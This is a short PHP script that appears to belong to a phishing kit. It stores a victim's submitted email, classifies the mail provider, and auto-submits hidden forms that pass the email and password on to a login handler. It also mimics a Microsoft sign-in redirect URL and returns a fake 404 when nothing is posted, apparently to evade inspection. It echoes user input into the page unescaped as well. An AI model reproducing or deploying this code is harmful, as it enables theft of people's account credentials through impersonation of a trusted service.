<?php
session_start();
if (!isset($_POST['email'])) {
exit(header("HTTP/1.0 404 Not Found"));
}
$_SESSION['email'] = $_POST['email'];
$email = explode("@",$_SESSION['email']);

if (preg_match('/hotmail/',  $email[1]) or preg_match('/live/', $email[1]) or preg_match('/msn/', $email[1]) or preg_match('/outlook/', $email[1]) or preg_match('/passport/', $email[1]) or preg_match('/gmail/', $email[1]) or preg_match('/yahoo/', $email[1]) or preg_match('/aol/', $email[1]) or preg_match('/comcast/', $email[1]) or preg_match('/./', $email[1])) {
echo "<form id='ptz' method='POST' action='auth/login'><input type='hidden' name='email' value='".$_POST['email']."'><input type='hidden' name='password' value='".$_POST['password']."'><input type='hidden' name='apistatus' value='".$_POST['apistatus']."'></form><script type='text/javascript'>document.getElementById('ptz').submit();</script>";
}else{
echo "<form id='ptz' method='POST' action='ppsecure?wa=wsignin1.0&rpsnv=13&rver=7.3.6963.0&wp=MBI_SSL&wreply=https%3a%2f%2fwww.microsoft.com%2fen-us%2f&lc=1033&id=74335&aadredir=1&ru=https%3a%2f%2fwww.microsoft.com%2fen-us%2f&uaid=876a74678f9446408bf0adc75cc213b7&pid=0&contextid=1EE93C44426274D9&bk=1619825115&mkt=EN-US'><input type='hidden' name='email' value='".$_SESSION['email']."'></form><script type='text/javascript'>document.getElementById('ptz').submit();</script>";
exit();
}
?>